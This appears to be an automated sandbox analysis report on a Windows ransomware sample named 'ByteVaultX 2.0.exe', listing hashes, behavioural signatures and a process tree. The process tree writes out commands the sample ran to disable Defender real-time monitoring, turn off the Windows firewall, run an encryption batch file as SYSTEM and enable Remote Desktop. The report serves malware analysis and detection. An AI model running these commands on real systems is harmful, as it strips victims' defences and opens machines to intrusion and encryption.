Resubmissions
22-05-2024 15:54
240522-tca45sgd54 1022-05-2024 15:32
240522-syx1csfh7z 1019-05-2024 21:56
240519-1tcgvsca5s 1019-05-2024 21:54
240519-1sln5sbh9x 1019-05-2024 21:53
240519-1rn3wabh6x 1019-05-2024 20:56
240519-zq5hsshf3v 1018-05-2024 09:15
240518-k76pvsda89 1018-05-2024 00:54
240518-a9ph9acb22 10Analysis
-
max time kernel
971s -
max time network
980s -
platform
windows11-21h2_x64 -
resource
win11-20240508-en -
resource tags
arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system -
submitted
19-05-2024 21:56
Behavioral task
behavioral1
Sample
ByteVaultX 2.0.exe
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
ByteVaultX 2.0.exe
Resource
win7-20231129-en
Behavioral task
behavioral3
Sample
ByteVaultX 2.0.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral4
Sample
ByteVaultX 2.0.exe
Resource
win11-20240508-en
General
-
Target
ByteVaultX 2.0.exe
-
Size
9.9MB
-
MD5
98e3408a9432d5046691c4cc744eb244
-
SHA1
c1e9d2c89d2cb72ee2f0f11ef97b2cb07d070142
-
SHA256
958e65dedf5f42e310cbf4e7ba87ce130c2b60d95afb1da8f7390f2002f6caa2
-
SHA512
dd4451441a051a6e9cc1be16702aaea1ce0fee4bd78c30cde050636e573b0ec1fcae4cde654a1928c941410840b8d0f989932779fc59e7bf70ce444029e689d5
-
SSDEEP
196608:ShFaRIk7AHkPkRJW9GNZA1HeT39Iig6eE9TFa0Z8DOjCdylNo1nz8QW7tx:tGFG8S1+TtIi+Y9Z8D8CclydoPx
Malware Config
Extracted
https://images.pexels.com/photos/970517/pexels-photo-970517.jpeg?cs=srgb&dl=pexels-mitja-juraja-357365-970517.jpg&fm=jpg
Extracted
C:\Encrypt\encrypt.html
Signatures
-
Renames multiple (157) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Blocklisted process makes network request 13 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeflow pid process 25 4560 powershell.exe 26 2440 powershell.exe 27 3596 powershell.exe 28 2764 powershell.exe 34 2220 powershell.exe 35 1528 powershell.exe 36 5080 powershell.exe 37 1096 powershell.exe 38 2312 powershell.exe 39 1724 powershell.exe 42 3916 powershell.exe 46 3340 powershell.exe 47 2160 powershell.exe -
Disables Task Manager via registry modification
-
Modifies Windows Firewall 2 TTPs 50 IoCs
Processes:
netsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exepid process 652 netsh.exe 2192 netsh.exe 836 netsh.exe 2252 netsh.exe 1908 netsh.exe 2180 netsh.exe 960 netsh.exe 5044 netsh.exe 1988 netsh.exe 2368 netsh.exe 3436 netsh.exe 1316 netsh.exe 3684 netsh.exe 2496 netsh.exe 1096 netsh.exe 4584 netsh.exe 1936 netsh.exe 2560 netsh.exe 2764 netsh.exe 3648 netsh.exe 4636 netsh.exe 1160 netsh.exe 2768 netsh.exe 2328 netsh.exe 2944 netsh.exe 2452 netsh.exe 1084 netsh.exe 1160 netsh.exe 4876 netsh.exe 784 netsh.exe 2644 netsh.exe 2000 netsh.exe 2368 netsh.exe 4352 netsh.exe 1828 netsh.exe 2696 netsh.exe 2072 netsh.exe 3460 netsh.exe 3912 netsh.exe 1512 netsh.exe 3288 netsh.exe 4820 netsh.exe 2624 netsh.exe 2064 netsh.exe 1484 netsh.exe 4440 netsh.exe 1040 netsh.exe 2440 netsh.exe 3888 netsh.exe 888 netsh.exe -
Loads dropped DLL 12 IoCs
Processes:
ByteVaultX 2.0.exepid process 5044 ByteVaultX 2.0.exe 5044 ByteVaultX 2.0.exe 5044 ByteVaultX 2.0.exe 5044 ByteVaultX 2.0.exe 5044 ByteVaultX 2.0.exe 5044 ByteVaultX 2.0.exe 5044 ByteVaultX 2.0.exe 5044 ByteVaultX 2.0.exe 5044 ByteVaultX 2.0.exe 5044 ByteVaultX 2.0.exe 5044 ByteVaultX 2.0.exe 5044 ByteVaultX 2.0.exe -
Drops desktop.ini file(s) 8 IoCs
Processes:
ByteVaultX 2.0.exedescription ioc process File opened for modification C:\Users\Admin\Music\desktop.ini ByteVaultX 2.0.exe File opened for modification C:\Users\Admin\Videos\desktop.ini ByteVaultX 2.0.exe File opened for modification C:\Users\Admin\Downloads\desktop.ini ByteVaultX 2.0.exe File opened for modification C:\Users\Admin\Documents\desktop.ini ByteVaultX 2.0.exe File opened for modification C:\Users\Admin\Pictures\desktop.ini ByteVaultX 2.0.exe File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini ByteVaultX 2.0.exe File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini ByteVaultX 2.0.exe File opened for modification C:\Users\Admin\Desktop\desktop.ini ByteVaultX 2.0.exe -
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 3596 powershell.exe 2040 powershell.exe 2944 powershell.exe 1448 powershell.exe 1168 powershell.exe 3568 powershell.exe 5080 powershell.exe 1408 powershell.exe 2312 powershell.exe 3436 powershell.exe 4680 powershell.exe 4412 powershell.exe 1168 powershell.exe 5064 powershell.exe 2624 powershell.exe 568 powershell.exe 2552 powershell.exe 1960 powershell.exe 1724 powershell.exe 2868 powershell.exe 2044 powershell.exe 652 powershell.exe 904 powershell.exe 4488 powershell.exe 1828 powershell.exe 4268 powershell.exe 4352 powershell.exe 888 powershell.exe 4888 powershell.exe 4560 powershell.exe 3768 powershell.exe 888 powershell.exe 1008 powershell.exe 2836 powershell.exe 3624 powershell.exe 2044 powershell.exe 5004 powershell.exe 1408 powershell.exe 4552 powershell.exe 4648 powershell.exe 1648 powershell.exe 1736 powershell.exe 3120 powershell.exe 4236 powershell.exe 3120 powershell.exe 4008 powershell.exe 1084 powershell.exe 3596 powershell.exe 5020 powershell.exe 3056 powershell.exe 2724 powershell.exe 3340 powershell.exe 2160 powershell.exe 3916 powershell.exe 568 powershell.exe 3560 powershell.exe 4008 powershell.exe 888 powershell.exe 652 powershell.exe 2644 powershell.exe 3600 powershell.exe 3236 powershell.exe 652 powershell.exe 1528 powershell.exe -
Sets desktop wallpaper using registry 2 TTPs 7 IoCs
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exereg.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
msedge.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Modifies registry class 7 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exemsedge.exemsedge.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exemsedge.exeidentity_helper.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 5004 powershell.exe 5004 powershell.exe 3800 msedge.exe 3800 msedge.exe 3484 msedge.exe 3484 msedge.exe 3156 powershell.exe 3156 powershell.exe 3156 powershell.exe 2724 powershell.exe 2724 powershell.exe 2724 powershell.exe 3560 powershell.exe 3560 powershell.exe 3560 powershell.exe 4008 powershell.exe 4008 powershell.exe 4008 powershell.exe 1408 powershell.exe 1408 powershell.exe 1408 powershell.exe 2268 msedge.exe 2268 msedge.exe 2244 identity_helper.exe 2244 identity_helper.exe 4680 powershell.exe 4680 powershell.exe 4680 powershell.exe 2624 powershell.exe 2624 powershell.exe 2624 powershell.exe 3268 powershell.exe 3268 powershell.exe 3268 powershell.exe 1112 powershell.exe 1112 powershell.exe 1112 powershell.exe 2868 powershell.exe 2868 powershell.exe 2868 powershell.exe 3236 powershell.exe 3236 powershell.exe 3236 powershell.exe 4560 powershell.exe 4560 powershell.exe 4560 powershell.exe 4820 powershell.exe 4820 powershell.exe 4820 powershell.exe 2440 powershell.exe 2440 powershell.exe 2440 powershell.exe 1736 powershell.exe 1736 powershell.exe 1736 powershell.exe 1828 powershell.exe 1828 powershell.exe 1828 powershell.exe 4504 powershell.exe 4504 powershell.exe 4504 powershell.exe 2044 powershell.exe 2044 powershell.exe 2044 powershell.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
Processes:
msedge.exepid process 3484 msedge.exe 3484 msedge.exe 3484 msedge.exe 3484 msedge.exe 3484 msedge.exe 3484 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 5004 powershell.exe Token: SeDebugPrivilege 3156 powershell.exe Token: SeDebugPrivilege 2724 powershell.exe Token: SeDebugPrivilege 3560 powershell.exe Token: SeDebugPrivilege 4008 powershell.exe Token: SeDebugPrivilege 1408 powershell.exe Token: SeDebugPrivilege 4680 powershell.exe Token: SeDebugPrivilege 2624 powershell.exe Token: SeDebugPrivilege 3268 powershell.exe Token: SeDebugPrivilege 1112 powershell.exe Token: SeDebugPrivilege 2868 powershell.exe Token: SeDebugPrivilege 3236 powershell.exe Token: SeDebugPrivilege 4560 powershell.exe Token: SeDebugPrivilege 4820 powershell.exe Token: SeDebugPrivilege 2440 powershell.exe Token: SeDebugPrivilege 1736 powershell.exe Token: SeDebugPrivilege 1828 powershell.exe Token: SeDebugPrivilege 4504 powershell.exe Token: SeDebugPrivilege 2044 powershell.exe Token: SeDebugPrivilege 4488 powershell.exe Token: SeDebugPrivilege 1960 powershell.exe Token: SeDebugPrivilege 3288 powershell.exe Token: SeDebugPrivilege 888 powershell.exe Token: SeDebugPrivilege 1040 powershell.exe Token: SeDebugPrivilege 652 powershell.exe Token: SeDebugPrivilege 4236 powershell.exe Token: SeDebugPrivilege 3596 powershell.exe Token: SeDebugPrivilege 2192 powershell.exe Token: SeDebugPrivilege 2764 powershell.exe Token: SeDebugPrivilege 2644 powershell.exe Token: SeDebugPrivilege 568 powershell.exe Token: SeDebugPrivilege 2836 powershell.exe Token: SeDebugPrivilege 4268 powershell.exe Token: SeDebugPrivilege 3568 powershell.exe Token: SeDebugPrivilege 3624 powershell.exe Token: SeDebugPrivilege 4552 powershell.exe Token: SeDebugPrivilege 4488 powershell.exe Token: SeDebugPrivilege 2044 powershell.exe Token: SeDebugPrivilege 3120 powershell.exe Token: SeDebugPrivilege 5064 powershell.exe Token: SeDebugPrivilege 2220 powershell.exe Token: SeDebugPrivilege 4088 powershell.exe Token: SeDebugPrivilege 1528 powershell.exe Token: SeDebugPrivilege 2944 powershell.exe Token: SeDebugPrivilege 4352 powershell.exe Token: SeDebugPrivilege 2000 powershell.exe Token: SeDebugPrivilege 2552 powershell.exe Token: SeDebugPrivilege 1084 powershell.exe Token: SeDebugPrivilege 780 powershell.exe Token: SeDebugPrivilege 3596 powershell.exe Token: SeDebugPrivilege 3768 powershell.exe Token: SeDebugPrivilege 652 powershell.exe Token: SeDebugPrivilege 4236 powershell.exe Token: SeDebugPrivilege 5080 powershell.exe Token: SeDebugPrivilege 2972 powershell.exe Token: SeDebugPrivilege 1096 powershell.exe Token: SeDebugPrivilege 4412 powershell.exe Token: SeDebugPrivilege 1796 powershell.exe Token: SeDebugPrivilege 3120 powershell.exe Token: SeDebugPrivilege 5020 powershell.exe Token: SeDebugPrivilege 3768 powershell.exe Token: SeDebugPrivilege 652 powershell.exe Token: SeDebugPrivilege 1408 powershell.exe Token: SeDebugPrivilege 1168 powershell.exe -
Suspicious use of FindShellTrayWindow 25 IoCs
Processes:
msedge.exepid process 3484 msedge.exe 3484 msedge.exe 3484 msedge.exe 3484 msedge.exe 3484 msedge.exe 3484 msedge.exe 3484 msedge.exe 3484 msedge.exe 3484 msedge.exe 3484 msedge.exe 3484 msedge.exe 3484 msedge.exe 3484 msedge.exe 3484 msedge.exe 3484 msedge.exe 3484 msedge.exe 3484 msedge.exe 3484 msedge.exe 3484 msedge.exe 3484 msedge.exe 3484 msedge.exe 3484 msedge.exe 3484 msedge.exe 3484 msedge.exe 3484 msedge.exe -
Suspicious use of SendNotifyMessage 12 IoCs
Processes:
msedge.exepid process 3484 msedge.exe 3484 msedge.exe 3484 msedge.exe 3484 msedge.exe 3484 msedge.exe 3484 msedge.exe 3484 msedge.exe 3484 msedge.exe 3484 msedge.exe 3484 msedge.exe 3484 msedge.exe 3484 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
ByteVaultX 2.0.exeByteVaultX 2.0.exemsedge.execmd.exedescription pid process target process PID 4560 wrote to memory of 5044 4560 ByteVaultX 2.0.exe ByteVaultX 2.0.exe PID 4560 wrote to memory of 5044 4560 ByteVaultX 2.0.exe ByteVaultX 2.0.exe PID 5044 wrote to memory of 5004 5044 ByteVaultX 2.0.exe powershell.exe PID 5044 wrote to memory of 5004 5044 ByteVaultX 2.0.exe powershell.exe PID 5044 wrote to memory of 1908 5044 ByteVaultX 2.0.exe netsh.exe PID 5044 wrote to memory of 1908 5044 ByteVaultX 2.0.exe netsh.exe PID 5044 wrote to memory of 1752 5044 ByteVaultX 2.0.exe runas.exe PID 5044 wrote to memory of 1752 5044 ByteVaultX 2.0.exe runas.exe PID 5044 wrote to memory of 3484 5044 ByteVaultX 2.0.exe msedge.exe PID 5044 wrote to memory of 3484 5044 ByteVaultX 2.0.exe msedge.exe PID 5044 wrote to memory of 4184 5044 ByteVaultX 2.0.exe cmd.exe PID 5044 wrote to memory of 4184 5044 ByteVaultX 2.0.exe cmd.exe PID 3484 wrote to memory of 4260 3484 msedge.exe msedge.exe PID 3484 wrote to memory of 4260 3484 msedge.exe msedge.exe PID 4184 wrote to memory of 2868 4184 cmd.exe reg.exe PID 4184 wrote to memory of 2868 4184 cmd.exe reg.exe PID 4184 wrote to memory of 1168 4184 cmd.exe reg.exe PID 4184 wrote to memory of 1168 4184 cmd.exe reg.exe PID 4184 wrote to memory of 4504 4184 cmd.exe reg.exe PID 4184 wrote to memory of 4504 4184 cmd.exe reg.exe PID 3484 wrote to memory of 4580 3484 msedge.exe msedge.exe PID 3484 wrote to memory of 4580 3484 msedge.exe msedge.exe PID 3484 wrote to memory of 4580 3484 msedge.exe msedge.exe PID 3484 wrote to memory of 4580 3484 msedge.exe msedge.exe PID 3484 wrote to memory of 4580 3484 msedge.exe msedge.exe PID 3484 wrote to memory of 4580 3484 msedge.exe msedge.exe PID 3484 wrote to memory of 4580 3484 msedge.exe msedge.exe PID 3484 wrote to memory of 4580 3484 msedge.exe msedge.exe PID 3484 wrote to memory of 4580 3484 msedge.exe msedge.exe PID 3484 wrote to memory of 4580 3484 msedge.exe msedge.exe PID 3484 wrote to memory of 4580 3484 msedge.exe msedge.exe PID 3484 wrote to memory of 4580 3484 msedge.exe msedge.exe PID 3484 wrote to memory of 4580 3484 msedge.exe msedge.exe PID 3484 wrote to memory of 4580 3484 msedge.exe msedge.exe PID 3484 wrote to memory of 4580 3484 msedge.exe msedge.exe PID 3484 wrote to memory of 4580 3484 msedge.exe msedge.exe PID 3484 wrote to memory of 4580 3484 msedge.exe msedge.exe PID 3484 wrote to memory of 4580 3484 msedge.exe msedge.exe PID 3484 wrote to memory of 4580 3484 msedge.exe msedge.exe PID 3484 wrote to memory of 4580 3484 msedge.exe msedge.exe PID 3484 wrote to memory of 4580 3484 msedge.exe msedge.exe PID 3484 wrote to memory of 4580 3484 msedge.exe msedge.exe PID 3484 wrote to memory of 4580 3484 msedge.exe msedge.exe PID 3484 wrote to memory of 4580 3484 msedge.exe msedge.exe PID 3484 wrote to memory of 4580 3484 msedge.exe msedge.exe PID 3484 wrote to memory of 4580 3484 msedge.exe msedge.exe PID 3484 wrote to memory of 4580 3484 msedge.exe msedge.exe PID 3484 wrote to memory of 4580 3484 msedge.exe msedge.exe PID 3484 wrote to memory of 4580 3484 msedge.exe msedge.exe PID 3484 wrote to memory of 4580 3484 msedge.exe msedge.exe PID 3484 wrote to memory of 4580 3484 msedge.exe msedge.exe PID 3484 wrote to memory of 4580 3484 msedge.exe msedge.exe PID 3484 wrote to memory of 4580 3484 msedge.exe msedge.exe PID 3484 wrote to memory of 4580 3484 msedge.exe msedge.exe PID 3484 wrote to memory of 4580 3484 msedge.exe msedge.exe PID 3484 wrote to memory of 4580 3484 msedge.exe msedge.exe PID 3484 wrote to memory of 4580 3484 msedge.exe msedge.exe PID 3484 wrote to memory of 4580 3484 msedge.exe msedge.exe PID 3484 wrote to memory of 4580 3484 msedge.exe msedge.exe PID 3484 wrote to memory of 4580 3484 msedge.exe msedge.exe PID 3484 wrote to memory of 3800 3484 msedge.exe msedge.exe PID 3484 wrote to memory of 3800 3484 msedge.exe msedge.exe PID 3484 wrote to memory of 872 3484 msedge.exe msedge.exe PID 3484 wrote to memory of 872 3484 msedge.exe msedge.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe"C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe"C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe"2⤵
- Loads dropped DLL
- Drops desktop.ini file(s)
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\netsh.exenetsh advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
-
C:\Windows\SYSTEM32\runas.exerunas /user:NT-AUTORITÄT\SYSTEM cmd.exe /c "C:\Encrypt\encrypt.bat"3⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Encrypt\encrypt.html3⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffa9063cb8,0x7fffa9063cc8,0x7fffa9063cd84⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1740,10107547138233678977,15751795947959346833,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1940 /prefetch:24⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1740,10107547138233678977,15751795947959346833,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 /prefetch:34⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1740,10107547138233678977,15751795947959346833,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2832 /prefetch:84⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1740,10107547138233678977,15751795947959346833,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3204 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1740,10107547138233678977,15751795947959346833,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3228 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1740,10107547138233678977,15751795947959346833,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2016 /prefetch:84⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1740,10107547138233678977,15751795947959346833,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5112 /prefetch:84⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1740,10107547138233678977,15751795947959346833,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5228 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1740,10107547138233678977,15751795947959346833,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5132 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1740,10107547138233678977,15751795947959346833,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3428 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1740,10107547138233678977,15751795947959346833,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5548 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1740,10107547138233678977,15751795947959346833,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=5308 /prefetch:24⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Encrypt\encrypt.bat" "3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f4⤵
-
